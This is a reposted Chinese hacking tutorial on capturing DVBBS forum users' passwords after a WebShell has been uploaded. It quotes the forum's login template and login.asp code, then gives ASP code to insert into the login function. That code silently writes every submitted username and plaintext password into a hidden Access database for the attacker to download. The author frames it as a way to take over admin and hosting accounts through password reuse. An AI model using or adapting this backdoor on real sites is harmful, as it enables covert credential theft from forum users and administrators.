截取动网BBS的用户密码

转载: 紫琦的Blog

大家知道，DVBBS的密码是经过MD5加密的，基本上得到了数据库也是很难破解的，最近动网的漏洞很多，相信大家也得到很多的WebShell的吧，至于如何利用，可能不是很多人清楚，得到数据库的路径，下载？然后密码是加密的，我是没办法破解，可能有人说，利用WebShell可以做很多的事情，是的，有时候确实是这样的，然后现在的虚拟主机能做的时候却很少，毕竟现在大部分的论坛都是买的空间，所以安全问题对于空间提供商也一定会考虑到的，下面我就以我的一个截取动网BBS密码的例子说明一下，其实也是很简单的，不怕你不会，就怕你想不到。
　　通过动网的漏洞上传一个WebShell，这个大家都知道怎么做了，我就不说了，得到WebShell，发现自己的权限低得要死，只能浏览本用户的文件夹，无法删除文件，无法重新命名文件，得到的权限只能是上传和编辑，我就用这点权限得到用户的密码。
　　
　　新建一个数据库，如下：
　　


因为我们只要得到用户的用户名和密码，所以简单了一点，在本地安装一个动网BBS，进入管理界面，外观设置—— 风格界面模板总管理——分页面模板(page_index) ，template.html(2)
获取官方数据，在里面发现如下的代码：

<!--index.asp##首页顶部表格未登录-->
　　欢迎您访问{ $forumname }，您还没有[<a href=reg.asp class=cblue>注册<a>]或[<a href=login.asp class=cblue>登录<a>]<br>
　　 <table cellspacing=0 cellpadding=0 align=center>
　　 <form action=login.asp?action=chk method=post>
　　 <tr><td class=tablebody1 height=40 width="100%">
　　用户姓名：<input maxLength=16 name=username size=12>{ $getcode }<br>
　　用户密码：<input maxLength=20 name=password size=12 type=password>
　　 <select name=CookieDate><option selected v　alue=0>不保存<option><option v　alue=1>保存一天<option><option v　alue=2>保存一月<option><option v　alue=3>保存一年<option><select> <input type=submit name=submit v　alue="登录">
　　 <td><tr>
　　 <form>
　　 { $isray }
　　 <table>
　　 ||
　　 <FORM METHOD=POST ACTION="login.asp?action=chk">
　　 <tr><td class=tablebody1 height=40 width="100%">
　　 <a href=boardhelp.asp>阳光会员<a>：<input maxLength=16 name=mobile size=12 v　alue=13><input type=submit name=submit v　alue="阳光会员快速注册"><td><tr><FORM>

现在已经很清楚，把得到的用户名和密码发往login.asp?action=chk文件进行验证，我们就要它了，呵呵，打开login.asp文件，发现代码如下：
Function Dvbbs_ChkLogin
　　
　　 Dim UserIP
　　 Dim username
　　 Dim userclass
　　 Dim password
　　 Dim article
　　 Dim usercookies
　　 Dim mobile
　　 Dim chrs,i
　　 If Dvbbs.forum_setting(79)="1" Then
　　 If Not Dvbbs.CodeIsTrue() Then
　　 Response.redirect "showerr.asp?ErrCodes=<li>验证码校验失败，请返回刷新页面后再输入验证码。&action=OtherErr"
　　 End If
　　 End If
　　 UserIP=Dvbbs.UserTrueIP
　　 mobile=trim(Dvbbs.CheckStr(request("mobile")))
　　 if mobile<>"" and request("username")="" then
　　 if len(mobile)<>11 then
　　 Dvbbs.AddErrCode(9)
　　 end if
　　 end if
　　 if mobile<>"" then
　　 if len(mobile)<>11 then mobile=""
　　 end if
　　 If request("username")="" Then
　　 If request("mobile")="" Then
　　 Dvbbs.AddErrCode(10)
　　 End If
　　 Else
　　 username=trim(Dvbbs.CheckStr(request("username")))
　　 End If
　　 If request("password")="" and mobile="" Then
　　 Dvbbs.AddErrCode(11)
　　 Else
　　 password=md5(trim(Dvbbs.CheckStr(request("password"))),16)
　　 End If
　　 If Dvbbs.ErrCodes<>"" Then Exit Function
　　 usercookies=request("CookieDate")
　　 '判断更新cookies目录
　　 Dim cookies_path_s,cookies_path_d,cookies_path
　　 cookies_path_s=split(Request.ServerVariables("PATH_INFO"),"/")
　　 cookies_path_d=ubound(cookies_path_s)
　　 cookies_path="/"
　　 For i=1 to cookies_path_d-1
　　 If not (cookies_path_s(i)="upload" or cookies_path_s(i)="admin") Then cookies_path=cookies_path&cookies_path_s(i)&"/"
　　 Next
　　 If dvbbs.cookiepath<>cookies_path Then
　　 cookies_path=replace(cookies_path,"'","")
　　 Dvbbs.execute("update dv_setup set Forum_Cookiespath='"&cookies_path&"'")
　　 Dim setupData
　　 Dvbbs.CacheData(26,0)=cookies_path
　　 Dvbbs.Name="setup"
　　 Dvbbs.v　alue=Dvbbs.CacheData
　　 End If
　　 If ChkUserLogin(username,password,mobile,usercookies,1)=false Then
　　 '本地验证未通过，使用手机号登录的
　　 If mobile<>"" Then
　　 challenge_check mobile,password
　　 Exit Function
　　 '本地验证未通过，使用用户名登录的，并且是高级用户则继续主服务器验证流程
　　 Else
　　 set chrs=Dvbbs.Execute("select UserMobile,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1")
　　 If chrs.eof and chrs.bof Then
　　 Dvbbs.AddErrCode(12)
　　 Exit Function
　　 Else
　　 challenge_check chrs("UserMobile"),password
　　 Exit Function
　　 End If
　　 set chrs=nothing
　　 End If
　　 End If
　　
　　 Dim comeurlname
　　 If instr(lcase(request("comeurl")),"reg.asp")>0 or instr(lcase(request("comeurl")),"login.asp")>0 or trim(request("comeurl"))="" Then
　　 comeurlname=""
　　 comeurl="index.asp"
　　 Else
　　 comeurl=request("comeurl")
　　 comeurlname="<li><a href="&request("comeurl")&">"&request("comeurl")&"<a><li>"
　　 End If
　　
　　 Dim TempStr
　　 TempStr = template.html(2)
　　 If Dvbbs.Forum_ChanSetting(0)=1 And Dvbbs.Forum_ChanSetting(10)=1 And Dvbbs.Forum_ChanSetting(12)=1 Then
　　 TempStr = Replace(TempStr,"{ $ray_logininfo }",template.html(3))
　　 Else
　　 TempStr = Replace(TempStr,"{ $ray_logininfo }","")
　　 End If
　　 TempStr = Replace(TempStr,"{ $comeurl }",comeurl)
　　 TempStr = Replace(TempStr,"{ $comeurlinfo }",comeurlname)
　　 TempStr = Replace(TempStr,"{ $forumname }",Dvbbs.Forum_Info(0))
　　 Response.Write TempStr
　　 TempStr=""
　　
　　 End Function
这是它的验证方式，我就不说了，我要在它验证的前面得到它的密码，所以，我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
　　 set con=server.createobject("adodb.connection")
　　 DBPath = Server.MapPath("example.mdb")
　　 con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
　　
　　
　　
　　 set rstmp=server.createobject("adodb.recordset")
　　
　　 username = Request.form("username")
　　 password = Request.form("password")
　　
　　 str="insert Into User (username,password) v　alues('"& username &"','"& password &"')"
　　 con.execute(str)
这样，用户登陆的用户名和密码就保存在我建立的数据库example.mdb中了，以后只要下载它就可以得到用户名和密码，而且不会出现什么错误的提示，呵呵，真好

至于得到了密码能做什么？？呵呵，不要问我，我也不知道，这个密码完全是明文的，现在大部分管理员都是很懒的，前台和后台密码一样，其实用相同的办法我们也可以取得后台的密码，我没时间做下去了，你感兴趣你来！！！
　　其实我最希望看见的情况就是，管理员的密码和购买空间时用的密码是一样的，呵呵，又有空间用了，好啊。。。。。。

本文地址：http://com.8s8s.com/it/it26194.htm